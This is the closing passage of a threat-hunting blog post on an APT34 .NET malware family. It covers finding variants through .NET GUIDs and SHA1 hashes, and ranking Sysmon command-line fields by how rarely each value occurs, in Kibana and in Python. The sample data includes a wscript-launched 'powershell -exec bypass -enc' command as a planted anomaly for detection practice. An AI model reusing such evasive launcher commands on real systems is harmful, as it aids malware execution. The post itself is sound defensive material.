Finally, from a parent-child process perspective, that process execution should look like the following figure:

hybrid-analysis

This figure was taken from Hybrid-Analysis (the link is in the reference section below) and shows a variant similar to the one discussed in this blog post. Alright, we are now moving on to the final section. I did some threat intel research and came across similar variants; I thought it was worth mentioning them here since we have already discussed APT34 tooling.

Additional Variants

On June 25, 2015, Brian Wallace published the article Using .NET GUIDs to help hunt for malware. In a nutshell, every time .NET source code is compiled to a binary, the binary contains two GUIDs (you can see an example of these values under the .NET details in the figure of the file dupdatechecker.exe above). According to the article, “One GUID is created by Visual Studio on the creation of new projects and stored as a string, the other is generated on every build and stored as a binary value. These GUIDs can be used to determine whether multiple samples are from the same Visual Studio project, effectively identifying the family, and to identify samples that are the result of the same build, allowing for the identification of post-compilation modifications made by tools such as builders.” Online resources such as VirusTotal allow you to search for .NET binaries by these GUID values. Searching VirusTotal for the netGUID value 84e31856-683b-41c0-81dd-a02d8b795026 taken from the binary dupdatechecker.exe suggests that there are at least four more variants from the same malware family in the wild. Here are the SHA1 hashes of these four binaries:

d47d5c372ae265698b5f01bc20a6c1b8fa8280d1
8777e01b93e5d025d51b6242279b9468acf3f311
c1e1939fadc64422b1e1018920a4c77f3f1a5d15
37aff6875b79db3d77b8c91eecad20d0c831e073

The binaries behind these SHA1 hashes show a similar code structure when decompiled with ILSpy, and once executed they perform similar activity and create similar files on the system. My assumption is that they are variants of the same threat.

Stacking Through Visualization

One of the most useful things you can do in Kibana is to visualize fields common to your indexed documents. In a visualization you can take the distinct strings in one field and stack them in a table or a pie chart. Stacking is frequency analysis: it orders the exact values of a field from the most common to the least common, and the values that occur only once or twice are where anomalies, such as a one-off launcher command line, stand out. That is how it helps you find a “needle in a haystack”. Take for example the following figure:

Parent Command Line 2

Create a Data Table visualization with a Terms bucket on the field event_data.ParentCommandLine (the [event_data][ParentCommandLine] field from the Logstash filter). This stacks the distinct strings in that field in descending order, from the most frequent exact string to the least. For hunting you want the other end of the list: switch the order to ascending and the least frequent strings come first, as shown in the image below (this option was not supported in the latest Elasticsearch and Kibana release at the time of writing; in the query DSL a terms aggregation accepts "order": {"_count": "asc"}, but Elasticsearch documents ascending-count ordering as approximate across shards, so treat rare hits as leads to verify rather than exact counts):

Parent Command Line Ascending

Here is another example:

Stacking Command Line Desc

The same works for event_data.CommandLine: a table stacked on that field lists the most frequent exact command lines first, and switching the order to ascending lists the least frequent ones, as shown in the image below:

Stacking Command Line - Asc

Side Note: both ParentCommandLine and CommandLine come from Sysmon event ID 1 (process creation).
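The same stacking can be reproduced outside Kibana, which is handy for a quick triage of an exported batch of events or for checking what the ascending order actually returns. The following is an added example (not code from the original post) that runs the frequency analysis described above over a handful of constructed Sysmon event ID 1 documents in the Winlogbeat field layout the post uses (event_data.ParentCommandLine and event_data.CommandLine), and also emits the equivalent Elasticsearch terms aggregation. The documents, paths and the keyword mapping of the fields are assumptions for the example.

```python
from collections import Counter

# Added example (not from the original post): "stacking" a field of Sysmon
# event ID 1 documents, i.e. frequency analysis of its exact values, with the
# rarest values first, plus the Elasticsearch DSL that does the same server-side.

def get_path(doc, path):
    """Read a dotted field path such as event_data.CommandLine from a nested dict."""
    for part in path.split("."):
        if not isinstance(doc, dict) or part not in doc:
            return None
        doc = doc[part]
    return doc

def stack(docs, field, ascending=True):
    """Return (value, count) pairs for one field; ascending puts the rarest first."""
    counts = Counter(v for v in (get_path(d, field) for d in docs) if v is not None)
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]), reverse=not ascending)

def rare_values(docs, field, max_count=1):
    """The 'needle in a haystack' list: values seen at most max_count times."""
    return [v for v, c in stack(docs, field) if c <= max_count]

def terms_agg_body(field, size=20, ascending=True):
    """Equivalent query DSL. The field is assumed to be mapped as keyword (Winlogbeat
    maps event_data.* that way); a terms aggregation cannot run on analyzed text.
    Elasticsearch documents ascending _count order as approximate across shards,
    so verify rare hits before acting on them."""
    return {
        "size": 0,
        "query": {"term": {"event_id": 1}},
        "aggs": {"stack": {"terms": {
            "field": field, "size": size,
            "order": {"_count": "asc" if ascending else "desc"},
        }}},
    }

def evt(parent_cmd, cmd):
    return {"event_id": 1, "event_data": {"ParentCommandLine": parent_cmd, "CommandLine": cmd}}

# Constructed sample documents; paths are placeholders, not the real sample's.
SAMPLE_DOCS = [
    evt(r"C:\Windows\Explorer.EXE", r'"C:\Program Files\Mozilla Firefox\firefox.exe"'),
    evt(r"C:\Windows\Explorer.EXE", r'"C:\Windows\System32\notepad.exe"'),
    evt(r"C:\Windows\Explorer.EXE", r'"C:\Windows\System32\cmd.exe"'),
    evt(r"C:\Windows\system32\svchost.exe -k netsvcs", r"C:\Windows\system32\taskhostw.exe"),
    evt(r"C:\Windows\system32\svchost.exe -k netsvcs", r"C:\Windows\system32\taskhostw.exe"),
    evt(r'wscript /b "C:\Users\jdoe\AppData\Roaming\GoogleUpdateTasks.vbs"',
        "powershell.exe -exec bypass -enc <encoded>"),
]

if __name__ == "__main__":
    for value, count in stack(SAMPLE_DOCS, "event_data.ParentCommandLine"):
        print(count, value)
    print(terms_agg_body("event_data.ParentCommandLine"))
```

In a real deployment the stack is dominated by explorer.exe, svchost.exe and similar launchers, and the wscript-launched PowerShell sits alone at the bottom of the ascending list, which is exactly the position the hunting workflow above relies on.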


I hope you have enjoyed reading this post. Please leave me a comment if you have any feedback, suggestions or things you would like me to write about in upcoming blog posts.

THE END!

References & Credits

GetNETGUIDs Python Lib
https://github.com/CylanceSPEAR/GetNETGUIDs

Hybrid-Analysis
https://www.hybrid-analysis.com/sample/de620a0511d14a2fbc9b225ebfda550973d956ab4dec7e460a42e9d2d3cf0588?environmentId=100

ILSpy
http://ilspy.net/

New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

Sysinternals Sysmon suspicious activity guide

Sysinternals Sysmon unleashed

ThreatHunter-Playbook (Sysmon Configuration Files)
https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/attack_matrix/windows/sysmon_configs

Using .NET GUIDs to help hunt for malware
https://www.virusbulletin.com/virusbulletin/2015/06/using-net-guids-help-hunt-malware

One Comment

  1. virtual time clock online

    Excellent, what a weblog it is! This web site provides
    helpful information to us, keep it up.
